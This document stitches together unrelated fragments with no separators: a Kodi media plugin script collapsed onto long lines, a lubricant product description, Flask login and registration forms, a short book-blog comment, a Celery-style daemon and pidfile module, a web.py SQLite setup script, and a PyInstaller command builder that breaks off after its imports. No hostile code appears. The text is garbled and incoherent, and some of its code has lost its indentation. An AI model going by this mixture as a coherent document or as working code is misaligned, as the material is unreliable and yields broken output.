addMenu(PLUGIN_URL+'?mode=options','<< '+addon.getLocalizedString(30043)+' >>') addMenu(PLUGIN_URL+'?mode=search','<<SEARCH>>') #dump a list of videos available to play if mode == 'main' or mode == 'folder': folderName='' if (mode == 'folder'): folderName = plugin_queries['directory'] else: pass try: service except NameError: xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30051), addon.getLocalizedString(30052), 
addon.getLocalizedString(30053)) log(addon.getLocalizedString(30050)+ 'hive-login', True) xbmcplugin.endOfDirectory(plugin_handle) if folderName == '': addMenu(PLUGIN_URL+'?mode=folder&instance='+instanceName+'&directory=FRIENDS','['+addon.getLocalizedString(30091)+']') addMenu(PLUGIN_URL+'?mode=folder&instance='+instanceName+'&directory=FEED','['+addon.getLocalizedString(30092)+']') mediaItems = service.getCollections() if mediaItems: for item in mediaItems: try: if item.file is None: addDirectory(service, item.folder) else: addMediaFile(service, item) except: addMediaFile(service, item) mediaItems = service.getMediaList(folderName,0) if mediaItems: for item in mediaItems: try: if item.file is None: addDirectory(service, item.folder) else: addMediaFile(service, item) except: addMediaFile(service, item) service.updateAuthorization(addon) #dump a list of videos available to play elif mode == 'search': searchText = '' try: searchText = plugin_queries['criteria'] except: searchText = '' if searchText == '': try: dialog = xbmcgui.Dialog() searchText = dialog.input('Enter search string', type=xbmcgui.INPUT_ALPHANUM) except: xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30100)) searchText = 'life' try: service except NameError: xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30051), addon.getLocalizedString(30052), addon.getLocalizedString(30053)) log(addon.getLocalizedString(30050)+ 'hive-login', True) xbmcplugin.endOfDirectory(plugin_handle) mediaItems = service.getSearchResults(searchText) if mediaItems: for item in mediaItems: try: if item.file is None: addDirectory(service, item.folder) else: addMediaFile(service, item) except: addMediaFile(service, item) service.updateAuthorization(addon) # xbmcplugin.setContent(int(sys.argv[1]), 'videos') # xbmcplugin.setProperty(int(sys.argv[1]),'IsPlayable', 'false') # xbmc.executebuiltin("ActivateWindow(Videos)") #play a video given its exact-title elif mode == 
'video' or mode == 'audio': filename = plugin_queries['filename'] try: directory = plugin_queries['directory'] except: directory = '' try: title = plugin_queries['title'] except: title = '' try: service except NameError: xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30051), addon.getLocalizedString(30052), addon.getLocalizedString(30053)) log(aaddon.getLocalizedString(30050)+ 'hive-login', True) xbmcplugin.endOfDirectory(plugin_handle) playbackType = 0 try: playbackType = plugin_queries['playback'] except: playbackType = '' if service.isPremium: try: if mode == 'audio': playbackType = int(addon.getSetting('playback_type_audio')) else: playbackType = int(addon.getSetting('playback_type_video')) except: playbackType = 0 else: try: if mode == 'audio': playbackType = int(addon.getSetting('free_playback_type_audio')) else: playbackType = int(addon.getSetting('free_playback_type_video')) except: if mode == 'audio': playbackType = 0 else: playbackType = 1 mediaFile = file.file(filename, title, '', 0, '','') mediaFolder = folder.folder(directory,directory) mediaURLs = service.getPlaybackCall(playbackType,package.package(mediaFile,mediaFolder )) playbackURL = '' # BEGIN JoKeRzBoX # - Get list of possible resolutions (quality), pre-ordered from best to lower res, from a String constant # - Create associative array (a.k.a. 
hash list) availableQualities with each available resolution (key) and media URL (value) # - Simple algorithm to go through possible resolutions and find the best available one based on user's choice # FIX: list of qualities shown to user are now ordered from highest to low resolution if mode == 'audio': possibleQualities = addon.getLocalizedString(30058) else: possibleQualities = addon.getLocalizedString(30057) listPossibleQualities = possibleQualities.split("|") availableQualities = {} for mediaURL in mediaURLs: availableQualities[mediaURL.qualityDesc] = mediaURL.url ## User has chosen: "Always original quality" #if playbackType == 0: # playbackURL = availableQualities['original'] # User has chosen a max quality other than "original". Let's decide on the best stream option available #else: userChosenQuality = listPossibleQualities[playbackType] reachedThreshold = 0 for quality in listPossibleQualities: if quality == userChosenQuality: reachedThreshold = 1 if reachedThreshold and quality in availableQualities: playbackURL = availableQualities[quality] chosenRes = str(quality) reachedThreshold = 0 if reachedThreshold and playbackType != len(listPossibleQualities)-1 and len(availableQualities) == 3: # Means that the exact encoding requested by user was not found. # Also, there are the only available: original, 360p and 240p (because cont = 3). # Therefore if user did not choose "always ask" it is safe to assume "original" is the one closest to the quality selected by user playbackURL = availableQualities['original'] # Desired quality still not found. 
Lets bring list of available options and let user select if playbackURL == '': options = [] for quality in listPossibleQualities: if quality in availableQualities: options.append(quality) ret = xbmcgui.Dialog().select(addon.getLocalizedString(30033), options) if ret >= 0: playbackURL = availableQualities[str(options[ret])] chosenRes = str(options[ret]) # END JoKeRzBoX # JoKeRzBox: FIX: when user does not choose from list, addon was still playing a stream if playbackURL != '': item = xbmcgui.ListItem(path=playbackURL) # item.setInfo( type="Video", infoLabels={ "Title": title , "Plot" : title } ) # item.setInfo( type="Video") # Add resolution to beginning of title while playing media. Format "<RES> | <TITLE>" if mode == 'audio': item.setInfo( type="music", infoLabels={ "Title": title + " @ " + chosenRes} ) else: item.setInfo( type="video", infoLabels={ "Title": title + " @ " + chosenRes, "Plot" : title } ) xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item) #play a video given its exact-title elif mode == 'requestencoding': filename = plugin_queries['filename'] try: directory = plugin_queries['directory'] except: directory = '' try: title = plugin_queries['title'] except: title = '' try: service except NameError: xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30051), addon.getLocalizedString(30052), addon.getLocalizedString(30053)) log(aaddon.getLocalizedString(30050)+ 'hive-login', True) xbmcplugin.endOfDirectory(plugin_handle) mediaFile = file.file(filename, title, '', 0, '','') mediaFolder = folder.folder(directory,directory) mediaURLs = service.getPlaybackCall(0,package.package(mediaFile,mediaFolder )) xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30087), title) elif mode == 'photo': filename = plugin_queries['filename'] try: directory = plugin_queries['directory'] except: directory = '' try: title = plugin_queries['title'] except: title = '' try: service except NameError: 
xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30051), addon.getLocalizedString(30052), addon.getLocalizedString(30053)) log(aaddon.getLocalizedString(30050)+ 'hive-login', True) xbmcplugin.endOfDirectory(plugin_handle) path = '' try: path = addon.getSetting('photo_folder') except: pass import os.path if not os.path.exists(path): path = '' while path == '': path = xbmcgui.Dialog().browse(0,addon.getLocalizedString(30038), 'files','',False,False,'') if not os.path.exists(path): path = '' else: addon.setSetting('photo_folder', path) mediaFile = file.file(filename, title, '', 0, '','') mediaFolder = folder.folder(directory,directory) mediaURLs = service.getPlaybackCall(0,package.package(mediaFile,mediaFolder )) playbackURL = '' for mediaURL in mediaURLs: if mediaURL.qualityDesc == 'original': playbackURL = mediaURL.url import xbmcvfs xbmcvfs.mkdir(path + '/'+str(directory)) try: xbmcvfs.rmdir(path + '/'+str(directory)+'/'+str(title)) except: pass service.downloadPicture(playbackURL, path + '/'+str(directory) + '/'+str(title)) xbmc.executebuiltin("XBMC.ShowPicture("+path + '/'+str(directory) + '/'+str(title)+")") #play a video given its exact-title elif mode == 'streamurl': url = plugin_queries['url'] try: title = plugin_queries['title'] except: title = '' try: service except NameError: xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30051), addon.getLocalizedString(30052), addon.getLocalizedString(30053)) log(aaddon.getLocalizedString(30050)+ 'hive-login', True) xbmcplugin.endOfDirectory(plugin_handle) url = re.sub('---', '&', url) item = xbmcgui.ListItem(path=url) item.setInfo( type="Video", infoLabels={ "Title": title , "Plot" : title } ) # item.setInfo( type="Music", infoLabels={ "Title": title , "Plot" : title } ) xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item) if mode == 'options' or mode == 'buildstrm' or mode == 'clearauth': 
addMenu(PLUGIN_URL+'?mode=clearauth','<<'+addon.getLocalizedString(30018)+'>>') addMenu(PLUGIN_URL+'?mode=buildstrm','<<'+addon.getLocalizedString(30025)+'>>') addMenu(PLUGIN_URL+'?mode=createsearch','<<Save Search>>') xbmcplugin.endOfDirectory(plugin_handle)
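The plugin above embeds media URLs inside its own plugin query string, so a raw `&` in the media URL would be misread as a parameter separator. Its workaround is to strip any literal `---` runs from the URL and then mask `&` as `---`, reversing the substitution at playback time (the `streamurl` and `buildstrm` modes). A minimal self-contained sketch of that round trip (the helper names here are illustrative, not from the add-on):

```python
import re

def mask_url(url):
    # Strip any pre-existing '---' first (as the add-on does), then mask
    # '&' so the URL can ride safely inside another query string.
    return re.sub('&', '---', re.sub('---', '', url))

def unmask_url(masked):
    # Reverse step applied when the masked URL is read back at playback.
    return re.sub('---', '&', masked)

src = 'http://example.com/v?id=42&token=abc'
masked = mask_url(src)
print(masked)               # http://example.com/v?id=42---token=abc
print(unmask_url(masked))   # http://example.com/v?id=42&token=abc
```

Note the scheme is lossy if a URL legitimately contains `---`; the add-on accepts that by deleting such runs up front.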
TOTAL MARTOL LVG 15 CF is an evanescent (vanishing) pressing oil. This original formulation takes into account the need to improve working conditions and to offer additional convenience for users. Lubricity, anti-wear and extreme-pressure additives give improved tool edge retention and an extremely good surface finish – factors which all contribute towards reduced production costs. We have formulated chlorine-free products in response to the need to protect the environment and the requirements of certain industries. Residue is < 0.05 % by mass after two hours in an oven at 200°C, and the oil does not leave marks on aluminium. It offers performance fully comparable to that obtained with an equivalent chlorinated product, with the advantages of not causing pollution and of less expensive disposal. The oil contains selected petroleum bases and additives designed to guarantee: – residue < 0.05 % by mass, – excellent wettability on aluminium, – no marks on aluminium during heat treatment, – no chlorine content.
from flask.ext.wtf import Form
# from flask.ext.wtf.file import FileField, FileRequired, FileAllowed
from wtforms import TextField, PasswordField, validators

from app import db
from models import User, Locator


#----------------------------------------------------------------------------
class LoginForm(Form):
    email = TextField('Email', [validators.Required()])
    password = PasswordField('Password', [validators.Required()])

    def validate_email(self, field):
        user = self.get_user()
        if user is None:
            raise validators.ValidationError('Invalid user.')
        if not user.check_password(password=self.password.data):
            raise validators.ValidationError('Invalid password.')

    def get_user(self):
        return db.session.query(User). \
            filter_by(email=self.email.data).first()


#----------------------------------------------------------------------------
class RegistrationForm(Form):
    email = TextField('Email Address',
                      [validators.Required(), validators.Email()])
    password = PasswordField('Password', [validators.Required()])
    confirm = PasswordField('Repeat Password',
                            [validators.Required(),
                             validators.EqualTo(
                                 'password',
                                 message='Passwords must match.')])

    def validate_email(self, field):
        if db.session.query(User). \
                filter_by(email=self.email.data).count() > 0:
            raise validators.ValidationError('Duplicate email.')


#----------------------------------------------------------------------------
class EditForm(Form):
    title = TextField('title', [validators.Required()])
    url = TextField('url', [validators.Required()])
    groupname = TextField('groupname')


#----------------------------------------------------------------------------
class SearchForm(Form):
    search = TextField('search', [validators.Required()])


#----------------------------------------------------------------------------
class RestorePasswordForm(Form):
    email = TextField('Email Address', [validators.Required()])

    def validate_email(self, field):
        if not db.session.query(User).filter_by(email=self.email.data).count():
            raise validators.ValidationError('Enter registered email.')
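The forms above rely on WTForms' inline-validator convention: a method named `validate_<fieldname>` is automatically run as an extra validator for that field during `Form.validate()`. A minimal stand-in sketch of that dispatch mechanism, in pure Python (it mimics the convention rather than importing wtforms; all class and method names here are illustrative):

```python
class ValidationError(Exception):
    pass

class MiniForm:
    # Toy re-implementation of WTForms' inline-validator dispatch:
    # for each field name, a method called validate_<name> (if present)
    # runs as an additional validator during validate().
    def __init__(self, **data):
        self.data = data
        self.errors = {}

    def validate(self):
        self.errors = {}
        for name, value in self.data.items():
            hook = getattr(self, 'validate_' + name, None)
            if hook is not None:
                try:
                    hook(value)
                except ValidationError as exc:
                    self.errors[name] = str(exc)
        return not self.errors

class RegistrationForm(MiniForm):
    taken = {'a@example.com'}   # stands in for the db.session query above

    def validate_email(self, value):
        if value in self.taken:
            raise ValidationError('Duplicate email.')

form = RegistrationForm(email='a@example.com')
print(form.validate())   # False
print(form.errors)       # {'email': 'Duplicate email.'}
```

In real WTForms the hook receives the form and the field object, and errors accumulate on `field.errors`; the naming convention, however, is exactly the one the `validate_email` methods above depend on.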
Looks like March is off to a great start so far! There's even one from my favorite authors list down there (Bridget Blackwood - sooooo good). I am really excited for Wicked Dark Dragon and Wicked My Love. Looks like we are getting some great releases in March. Thanks for sharing. It's always fun to see what is coming out that I need to grab up as soon as it's released. Putting this together gets me in trouble sometimes. Waaay too much good stuff out there!
from __future__ import unicode_literals, absolute_import, print_function

import os
import sys
import math
import errno
import atexit
import importlib
import signal as _signal
import numbers
import itertools

try:
    from io import UnsupportedOperation
    FILENO_ERRORS = (AttributeError, ValueError, UnsupportedOperation)
except ImportError:  # pragma: no cover
    # Py2
    FILENO_ERRORS = (AttributeError, ValueError)  # noqa


def uniq(it):
    """Return all unique elements in ``it``, preserving order."""
    seen = set()
    return (seen.add(obj) or obj for obj in it if obj not in seen)


def get_errno(exc):
    """:exc:`socket.error` and :exc:`IOError` first got the ``.errno``
    attribute in Py2.7"""
    try:
        return exc.errno
    except AttributeError:
        try:
            # e.args = (errno, reason)
            if isinstance(exc.args, tuple) and len(exc.args) == 2:
                return exc.args[0]
        except AttributeError:
            pass
    return 0


def try_import(module, default=None):
    """Try to import and return module, or return None if the module
    does not exist."""
    try:
        return importlib.import_module(module)
    except ImportError:
        return default


def fileno(f):
    if isinstance(f, numbers.Integral):
        return f
    return f.fileno()


def maybe_fileno(f):
    """Get object fileno, or :const:`None` if not defined."""
    try:
        return fileno(f)
    except FILENO_ERRORS:
        pass


class LockFailed(Exception):
    """Raised if a pidlock can't be acquired."""


EX_CANTCREAT = getattr(os, 'EX_CANTCREAT', 73)
EX_FAILURE = 1

PIDFILE_FLAGS = os.O_CREAT | os.O_EXCL | os.O_WRONLY
PIDFILE_MODE = ((os.R_OK | os.W_OK) << 6) | ((os.R_OK) << 3) | ((os.R_OK))

PIDLOCKED = """ERROR: Pidfile ({0}) already exists.
Seems we're already running? (pid: {1})"""


def get_fdmax(default=None):
    """Return the maximum number of open file descriptors
    on this system.

    :keyword default: Value returned if there's no file
                      descriptor limit.

    """
    try:
        return os.sysconf('SC_OPEN_MAX')
    except Exception:
        pass
    if resource is None:  # Windows
        return default
    fdmax = resource.getrlimit(resource.RLIMIT_NOFILE)[1]
    if fdmax == resource.RLIM_INFINITY:
        return default
    return fdmax


class Pidfile(object):
    """Pidfile

    This is the type returned by :func:`create_pidlock`.

    TIP: Use the :func:`create_pidlock` function instead, which is more
    convenient and also removes stale pidfiles (when the process holding
    the lock is no longer running).
    """

    #: Path to the pid lock file.
    path = None

    def __init__(self, path):
        self.path = os.path.abspath(path)

    def acquire(self):
        """Acquire lock."""
        try:
            self.write_pid()
        except OSError as exc:
            raise LockFailed(str(exc))
        return self
    __enter__ = acquire

    def is_locked(self):
        """Return true if the pid lock exists."""
        return os.path.exists(self.path)

    def release(self, *args):
        """Release lock."""
        self.remove()
    __exit__ = release

    def read_pid(self):
        """Read and return the current pid."""
        try:
            with open(self.path, 'r') as fh:
                line = fh.readline()
                if line.strip() == line:  # must contain '\n'
                    raise ValueError(
                        'Partial or invalid pidfile {0.path}'.format(self))
                try:
                    return int(line.strip())
                except ValueError:
                    raise ValueError(
                        'pidfile {0.path} contents invalid.'.format(self))
        except EnvironmentError as exc:
            if exc.errno != errno.ENOENT:  # missing pidfile is fine
                raise

    def remove(self):
        """Remove the lock."""
        try:
            os.unlink(self.path)
        except OSError as exc:
            if exc.errno not in (errno.ENOENT, errno.EACCES):
                raise

    def remove_if_stale(self):
        """Remove the lock if the process is not running.
        (does not respond to signals)."""
        try:
            pid = self.read_pid()
        except ValueError:
            print('Broken pidfile found. Removing it.', file=sys.stderr)
            self.remove()
            return True
        if not pid:
            self.remove()
            return True
        if not pid_exists(pid):
            print('Stale pidfile exists. Removing it.', file=sys.stderr)
            self.remove()
            return True
        return False

    def write_pid(self):
        pid = os.getpid()
        content = '{0}\n'.format(pid)

        pidfile_fd = os.open(self.path, PIDFILE_FLAGS, PIDFILE_MODE)
        pidfile = os.fdopen(pidfile_fd, 'w')
        try:
            pidfile.write(content)
            # flush and sync so that the re-read below works.
            pidfile.flush()
            try:
                os.fsync(pidfile_fd)
            except AttributeError:  # pragma: no cover
                pass
        finally:
            pidfile.close()

        rfh = open(self.path)
        try:
            if rfh.read() != content:
                raise LockFailed(
                    "Inconsistency: Pidfile content doesn't match at re-read")
        finally:
            rfh.close()


def create_pidlock(pidfile):
    """Create and verify pidfile.

    If the pidfile already exists the program exits with an error message,
    however if the process it refers to is not running anymore, the pidfile
    is deleted and the program continues.

    This function will automatically install an :mod:`atexit` handler
    to release the lock at exit, you can skip this by calling
    :func:`_create_pidlock` instead.

    :returns: :class:`Pidfile`.

    **Example**:

    .. code-block:: python

        pidlock = create_pidlock('/var/run/app.pid')

    """
    pidlock = _create_pidlock(pidfile)
    atexit.register(pidlock.release)
    return pidlock


def _create_pidlock(pidfile):
    pidlock = Pidfile(pidfile)
    if pidlock.is_locked() and not pidlock.remove_if_stale():
        print(PIDLOCKED.format(pidfile, pidlock.read_pid()), file=sys.stderr)
        raise SystemExit(EX_CANTCREAT)
    pidlock.acquire()
    return pidlock


resource = try_import('resource')
pwd = try_import('pwd')
grp = try_import('grp')

DAEMON_UMASK = 0
DAEMON_WORKDIR = '/'

if hasattr(os, 'closerange'):

    def close_open_fds(keep=None):
        # must make sure this is 0-inclusive (Issue #1882)
        keep = list(uniq(sorted(
            f for f in map(maybe_fileno, keep or []) if f is not None
        )))
        maxfd = get_fdmax(default=2048)
        kL, kH = iter([-1] + keep), iter(keep + [maxfd])
        # Py2/Py3 compat: izip_longest was renamed zip_longest in Py3.
        zip_longest = getattr(itertools, 'zip_longest', None) or \
            itertools.izip_longest
        for low, high in zip_longest(kL, kH):
            if low + 1 != high:
                os.closerange(low + 1, high)

else:

    def close_open_fds(keep=None):  # noqa
        keep = [maybe_fileno(f) for f in (keep or [])
                if maybe_fileno(f) is not None]
        for fd in reversed(range(get_fdmax(default=2048))):
            if fd not in keep:
                try:
                    os.close(fd)
                except OSError as exc:
                    if exc.errno != errno.EBADF:  # already closed is fine
                        raise


class DaemonContext(object):
    _is_open = False

    def __init__(self, pidfile=None, workdir=None, umask=None,
                 fake=False, after_chdir=None, **kwargs):
        self.workdir = workdir or DAEMON_WORKDIR
        self.umask = DAEMON_UMASK if umask is None else umask
        self.fake = fake
        self.after_chdir = after_chdir
        self.stdfds = (sys.stdin, sys.stdout, sys.stderr)

    def redirect_to_null(self, fd):
        if fd is not None:
            dest = os.open(os.devnull, os.O_RDWR)
            os.dup2(dest, fd)

    def open(self):
        if not self._is_open:
            if not self.fake:
                self._detach()

            os.chdir(self.workdir)
            os.umask(self.umask)

            if self.after_chdir:
                self.after_chdir()

            close_open_fds(self.stdfds)
            for fd in self.stdfds:
                self.redirect_to_null(maybe_fileno(fd))

            self._is_open = True
    __enter__ = open

    def close(self, *args):
        if self._is_open:
            self._is_open = False
    __exit__ = close

    def _detach(self):
        if os.fork() == 0:      # first child
os.setsid() # create new session if os.fork() > 0: # second child os._exit(0) else: os._exit(0) return self def detached(logfile=None, pidfile=None, uid=None, gid=None, umask=0, workdir=None, fake=False, **opts): """Detach the current process in the background (daemonize). :keyword logfile: Optional log file. The ability to write to this file will be verified before the process is detached. :keyword pidfile: Optional pidfile. The pidfile will not be created, as this is the responsibility of the child. But the process will exit if the pid lock exists and the pid written is still running. :keyword uid: Optional user id or user name to change effective privileges to. :keyword gid: Optional group id or group name to change effective privileges to. :keyword umask: Optional umask that will be effective in the child process. :keyword workdir: Optional new working directory. :keyword fake: Don't actually detach, intented for debugging purposes. :keyword \*\*opts: Ignored. **Example**: .. code-block:: python from celery.platforms import detached, create_pidlock with detached(logfile='/var/log/app.log', pidfile='/var/run/app.pid', uid='nobody'): # Now in detached child process with effective user set to nobody, # and we know that our logfile can be written to, and that # the pidfile is not locked. pidlock = create_pidlock('/var/run/app.pid') # Run the program program.run(logfile='/var/log/app.log') """ if not resource: raise RuntimeError('This platform does not support detach.') workdir = os.getcwd() if workdir is None else workdir signals.reset('SIGCLD') # Make sure SIGCLD is using the default handler. maybe_drop_privileges(uid=uid, gid=gid) def after_chdir_do(): # Since without stderr any errors will be silently suppressed, # we need to know that we have access to the logfile. logfile and open(logfile, 'a').close() # Doesn't actually create the pidfile, but makes sure it's not stale. 
if pidfile: _create_pidlock(pidfile).release() return DaemonContext( umask=umask, workdir=workdir, fake=fake, after_chdir=after_chdir_do, ) def parse_uid(uid): """Parse user id. uid can be an integer (uid) or a string (user name), if a user name the uid is taken from the system user registry. """ try: return int(uid) except ValueError: try: return pwd.getpwnam(uid).pw_uid except (AttributeError, KeyError): raise KeyError('User does not exist: {0}'.format(uid)) def parse_gid(gid): """Parse group id. gid can be an integer (gid) or a string (group name), if a group name the gid is taken from the system group registry. """ try: return int(gid) except ValueError: try: return grp.getgrnam(gid).gr_gid except (AttributeError, KeyError): raise KeyError('Group does not exist: {0}'.format(gid)) def _setgroups_hack(groups): """:fun:`setgroups` may have a platform-dependent limit, and it is not always possible to know in advance what this limit is, so we use this ugly hack stolen from glibc.""" groups = groups[:] while 1: try: return os.setgroups(groups) except ValueError: # error from Python's check. if len(groups) <= 1: raise groups[:] = groups[:-1] except OSError as exc: # error from the OS. if exc.errno != errno.EINVAL or len(groups) <= 1: raise groups[:] = groups[:-1] def setgroups(groups): """Set active groups from a list of group ids.""" max_groups = None try: max_groups = os.sysconf('SC_NGROUPS_MAX') except Exception: pass try: return _setgroups_hack(groups[:max_groups]) except OSError as exc: if exc.errno != errno.EPERM: raise if any(group not in groups for group in os.getgroups()): # we shouldn't be allowed to change to this group. 
raise def initgroups(uid, gid): """Compat version of :func:`os.initgroups` which was first added to Python 2.7.""" if not pwd: # pragma: no cover return username = pwd.getpwuid(uid)[0] if hasattr(os, 'initgroups'): # Python 2.7+ return os.initgroups(username, gid) groups = [gr.gr_gid for gr in grp.getgrall() if username in gr.gr_mem] setgroups(groups) def setgid(gid): """Version of :func:`os.setgid` supporting group names.""" os.setgid(parse_gid(gid)) def setuid(uid): """Version of :func:`os.setuid` supporting usernames.""" os.setuid(parse_uid(uid)) def maybe_drop_privileges(uid=None, gid=None): """Change process privileges to new user/group. If UID and GID is specified, the real user/group is changed. If only UID is specified, the real user is changed, and the group is changed to the users primary group. If only GID is specified, only the group is changed. """ if sys.platform == 'win32': return if os.geteuid(): # no point trying to setuid unless we're root. if not os.getuid(): raise AssertionError('contact support') uid = uid and parse_uid(uid) gid = gid and parse_gid(gid) if uid: # If GID isn't defined, get the primary GID of the user. if not gid and pwd: gid = pwd.getpwuid(uid).pw_gid # Must set the GID before initgroups(), as setgid() # is known to zap the group list on some platforms. # setgid must happen before setuid (otherwise the setgid operation # may fail because of insufficient privileges and possibly stay # in a privileged group). setgid(gid) initgroups(uid, gid) # at last: setuid(uid) # ... and make sure privileges cannot be restored: try: setuid(0) except OSError as exc: if get_errno(exc) != errno.EPERM: raise pass # Good: cannot restore privileges. 
else: raise RuntimeError( 'non-root user able to restore privileges after setuid.') else: gid and setgid(gid) if uid and (not os.getuid()) and not (os.geteuid()): raise AssertionError('Still root uid after drop privileges!') if gid and (not os.getgid()) and not (os.getegid()): raise AssertionError('Still root gid after drop privileges!') class Signals(object): """Convenience interface to :mod:`signals`. If the requested signal is not supported on the current platform, the operation will be ignored. **Examples**: .. code-block:: python >>> from celery.platforms import signals >>> from proj.handlers import my_handler >>> signals['INT'] = my_handler >>> signals['INT'] my_handler >>> signals.supported('INT') True >>> signals.signum('INT') 2 >>> signals.ignore('USR1') >>> signals['USR1'] == signals.ignored True >>> signals.reset('USR1') >>> signals['USR1'] == signals.default True >>> from proj.handlers import exit_handler, hup_handler >>> signals.update(INT=exit_handler, ... TERM=exit_handler, ... 
HUP=hup_handler) """ ignored = _signal.SIG_IGN default = _signal.SIG_DFL if hasattr(_signal, 'setitimer'): def arm_alarm(self, seconds): _signal.setitimer(_signal.ITIMER_REAL, seconds) else: # pragma: no cover try: from itimer import alarm as _itimer_alarm # noqa except ImportError: def arm_alarm(self, seconds): # noqa _signal.alarm(math.ceil(seconds)) else: # pragma: no cover def arm_alarm(self, seconds): # noqa return _itimer_alarm(seconds) # noqa def reset_alarm(self): return _signal.alarm(0) def supported(self, signal_name): """Return true value if ``signal_name`` exists on this platform.""" try: return self.signum(signal_name) except AttributeError: pass def signum(self, signal_name): """Get signal number from signal name.""" if isinstance(signal_name, numbers.Integral): return signal_name if not isinstance(signal_name, basestring) \ or not signal_name.isupper(): raise TypeError('signal name must be uppercase string.') if not signal_name.startswith('SIG'): signal_name = 'SIG' + signal_name return getattr(_signal, signal_name) def reset(self, *signal_names): """Reset signals to the default signal handler. Does nothing if the platform doesn't support signals, or the specified signal in particular. """ self.update((sig, self.default) for sig in signal_names) def ignore(self, *signal_names): """Ignore signal using :const:`SIG_IGN`. Does nothing if the platform doesn't support signals, or the specified signal in particular. """ self.update((sig, self.ignored) for sig in signal_names) def __getitem__(self, signal_name): return _signal.getsignal(self.signum(signal_name)) def __setitem__(self, signal_name, handler): """Install signal handler. Does nothing if the current platform doesn't support signals, or the specified signal in particular. 
""" try: _signal.signal(self.signum(signal_name), handler) except (AttributeError, ValueError): pass def update(self, _d_=None, **sigmap): """Set signal handlers from a mapping.""" for signal_name, handler in dict(_d_ or {}, **sigmap).items(): self[signal_name] = handler signals = Signals() def pid_exists(pid): """Check whether pid exists in the current process table. UNIX only. """ if pid < 0: return False if pid == 0: # According to "man 2 kill" PID 0 refers to every process # in the process group of the calling process. # On certain systems 0 is a valid PID but we have no way # to know that in a portable fashion. raise ValueError('invalid PID 0') try: os.kill(pid, 0) except OSError as err: if err.errno == errno.ESRCH: # ESRCH == No such process return False elif err.errno == errno.EPERM: # EPERM clearly means there's a process to deny access to return True else: # According to "man 2 kill" possible error values are # (EINVAL, EPERM, ESRCH) raise else: return True
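The pidfile logic above combines two checks: read the recorded pid from disk, then probe it with `os.kill(pid, 0)`, which delivers no signal and only reports whether the process exists. A minimal standalone sketch of that stale-pidfile test (function names here are illustrative, not the module's public API):

```python
import errno
import os


def pid_exists(pid):
    """Best-effort check that ``pid`` names a live process (UNIX only)."""
    if pid <= 0:
        return False
    try:
        os.kill(pid, 0)  # signal 0: error checking only, nothing is delivered
    except OSError as err:
        # ESRCH: no such process; EPERM: it exists but belongs to another user.
        return err.errno == errno.EPERM
    return True


def remove_if_stale(path):
    """Delete the pidfile at ``path`` if the pid it names is dead or unreadable."""
    try:
        with open(path) as fh:
            pid = int(fh.read().strip())
    except ValueError:
        os.unlink(path)  # broken pidfile, e.g. a partial write
        return True
    except OSError:
        return True  # no pidfile at all, so nothing holds the lock
    if not pid_exists(pid):
        os.unlink(path)
        return True
    return False
```

The EPERM branch matters: a pid owned by another user is still a live lock holder, so the pidfile must be kept.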
import web
import os.path
import sys
import shutil

DATABASE = 'db/libros.sqlite'


def _touch(fname, times=None):
    try:
        fhandle = open(fname, 'a')
        try:
            os.utime(fname, times)
        finally:
            fhandle.close()
        return True
    except (IOError, OSError):
        return False


def _init():
    import sqlite3
    conn = sqlite3.connect(DATABASE)
    c = conn.cursor()
    from tables import items, item1, users, admin, org, nif, grades, \
        groups, tickets, students, books, default_grade, default_group
    c.execute(items)
    c.execute(item1)
    c.execute(users)
    c.execute(admin)
    c.execute(org)
    c.execute(nif)
    c.execute(grades)
    c.execute(default_grade)
    c.execute(groups)
    c.execute(default_group)
    c.execute(tickets)
    c.execute(students)
    c.execute(books)
    conn.commit()
    conn.close()


def _copy_blank():
    shutil.copy2(DATABASE, 'db/libros-vacia.sqlite')


if os.path.isfile(DATABASE):
    DB = web.database(dbn='sqlite', db=DATABASE)
else:
    print DATABASE, 'file not found.'
    if _touch(DATABASE):
        print 'initializing database', DATABASE, '...'
        _init()
        _copy_blank()
        DB = web.database(dbn='sqlite', db=DATABASE)
    else:
        print 'Error creating', DATABASE, 'file.'
        sys.exit(1)

cache = False
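The start-up block above creates the SQLite file on first run, executes the schema statements imported from tables.py, and keeps a blank copy of the fresh database for later resets. The same pattern in a compact, framework-free form (the schema and paths below are illustrative, not the project's real tables):

```python
import os
import shutil
import sqlite3


def ensure_database(path, schema_statements):
    """Create ``path`` with the given schema on first run; no-op afterwards.

    Returns True when the database was just initialized, False if it existed.
    """
    if os.path.isfile(path):
        return False
    conn = sqlite3.connect(path)  # connecting creates the file
    try:
        cur = conn.cursor()
        for stmt in schema_statements:
            cur.execute(stmt)
        conn.commit()
    finally:
        conn.close()
    # Keep a pristine copy for resets, mirroring _copy_blank() above.
    shutil.copy2(path, path + '.blank')
    return True
```

Checking `os.path.isfile` before connecting is what makes the call idempotent: `sqlite3.connect` would otherwise happily create an empty, schema-less file.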
import os
import subprocess
import sys

import controller


def pyversion(installdir):
    """Return the installed PyInstaller version as a float (e.g. 2.1)."""
    sys.path.insert(0, installdir)
    from PyInstaller import get_version
    return float(get_version()[:3])


def getflags(fname):
    config = controller.getConfig()
    flags = []
    flags.append(sys.executable)  # Python executable to run pyinstaller
    flags.append(os.path.join(config['pyidir'], config['pyscript']))
    if config['noconfirm']:
        flags.append('--noconfirm')
    if config['singlefile']:
        flags.append('--onefile')
    if config['ascii']:
        flags.append('--ascii')
    if config['windowed']:
        flags.append('--noconsole')
    if config['upxdir'] != '':
        flags.append('--upx-dir=' + config['upxdir'])
    if pyversion(config['pyidir']) >= 2.1:
        # PyInstaller 2.1 renamed --out to --distpath.
        flags.append('--distpath=' + os.path.dirname(fname))  # Output to same dir as script.
    else:
        flags.append('--out=' + os.path.dirname(fname))
    flags.append(fname)
    return flags
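getflags() above is essentially a table of boolean config keys mapped to CLI switches, plus one version-dependent output flag. A dependency-free sketch of the same idea (the config keys mirror those used above; `controller` and its config format are assumed, so the helper takes a plain dict instead):

```python
import os
import sys


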